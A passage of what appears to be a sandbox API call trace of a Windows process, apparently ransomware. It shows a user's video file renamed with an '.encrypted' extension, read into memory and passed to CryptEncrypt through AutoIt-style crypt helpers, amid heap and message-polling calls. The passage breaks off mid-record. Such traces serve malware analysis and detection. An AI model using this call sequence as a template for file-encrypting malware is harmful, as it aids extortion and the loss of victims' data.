[0043.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0043.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db300 | out: hHeap=0x770000) returned 1 [0043.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1f8 | out: hHeap=0x770000) returned 1 [0043.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0043.058] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0043.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0043.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0xab2010 [0043.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0043.058] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0043.058] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\_mHpWJR_Yl93 b\\H1IbodoXI-.encrypted.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\_mhpwjr_yl93 b\\h1ibodoxi-.encrypted.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0043.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0043.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0043.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1f8 [0043.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0043.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0043.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0043.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.059] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0043.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0043.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0043.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0043.059] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.059] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0043.059] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c21c0 [0043.059] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da318 [0043.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0043.059] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0043.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0043.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0043.060] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0043.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0043.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0043.060] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0043.060] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0043.060] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x10000, lpOverlapped=0x0) returned 1 [0043.063] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x8fc, lpOverlapped=0x0) returned 1 [0043.063] ReadFile (in: hFile=0x128, lpBuffer=0xaa0008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0xaa0008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0043.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0043.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0043.063] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0043.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.063] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x108fc) returned 0xac2018 [0043.064] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0043.065] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0043.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0043.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0043.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x108fc) returned 0xac2018 [0043.065] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.065] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0043.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.066] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0043.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0043.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0043.066] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.066] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0043.067] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0043.067] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0043.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0043.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0043.067] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0043.067] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0043.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0043.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0043.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0043.067] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.068] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e138 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da268 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da288 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0043.068] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cec8 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da278 [0043.068] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c940 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0043.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0043.069] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.069] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3f8 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0043.069] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.069] CryptGetKeyParam (in: hKey=0x7c2200, dwParam=0x7, pbData=0x7da308, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da308*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da248 [0043.069] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0043.069] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da278 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da258 [0043.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae9c8 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a60 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da398 [0043.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2c8 [0043.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2c8 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0043.070] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0043.070] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0043.070] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0043.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.071] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0043.071] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0043.071] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.071] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.071] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0043.071] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.071] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0043.071] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.071] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2300 [0043.071] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0043.071] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.071] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da408 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1c88 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0043.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0043.072] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.072] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0043.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0043.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccb8 [0043.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0043.072] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x108fc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x10900) returned 1 [0043.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.073] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.073] CharLowerBuffW (in: lpsz="byte[67841]", cchLength=0xb | out: lpsz="byte[67841]") returned 0xb [0043.073] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.074] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.074] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0043.074] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0043.074] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0043.074] CryptEncrypt (in: hKey=0x7c2200, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x945910*, pdwDataLen=0x6ae220*=0x108fc, dwBufLen=0x10900 | out: pbData=0x945910*, pdwDataLen=0x6ae220*=0x10900) returned 1 [0043.074] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0043.074] PeekMessageW (in: 